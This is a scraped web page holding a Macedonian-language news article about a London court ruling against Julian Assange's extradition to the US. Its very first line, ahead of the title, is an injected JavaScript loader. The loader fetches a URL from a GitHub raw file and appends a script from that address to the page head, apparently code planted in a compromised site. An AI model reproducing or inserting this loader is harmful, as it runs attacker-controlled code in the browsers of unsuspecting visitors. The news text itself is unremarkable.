;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Судот во Лондон пресуди против екстрадиција на Асанж во САД - Антропол
АктуелноИнтернационално

Судот во Лондон пресуди против екстрадиција на Асанж во САД

Британската судијка Ванеса Барајтсер денес пресуди дека Џулијан Асанж не треба да биде екстрадиран во САД под обвинение за шпиунажа и хакирање на владини компјутери.

Изминатите неколку години, САД се обидуваа да го екстрадираат Асанж врз основа на 18 обвиненија поврзани со објавите на Викиликс од 2010 кога стотици илјади тајни документи го обелоденија вклучувањето на Владата на САД во нелегални воени акции, како убиства на цивили, тортура и други злоупотреби, особено во Авганистан и Ирак.

Доколку основачот на Викиликс биде екстрадиран во САД, му се заканува затворска казна од 175 години. Неговите адвокати тврдат дека обидите за екстрадиција на Асанж се очигледен пример за нарушување на слободата на говор и ја откриваат намерата на Вашингтон да го казне основачот на Викиликс за разоткривањето на нелегалните дејства на САД ширум светот.

Денешната судска одлука сепак не гарантира дека екстрадицијата ќе биде спречена, бидејќи одлуката на судијката Брајтсет би можела да биде обжалена во следните денови.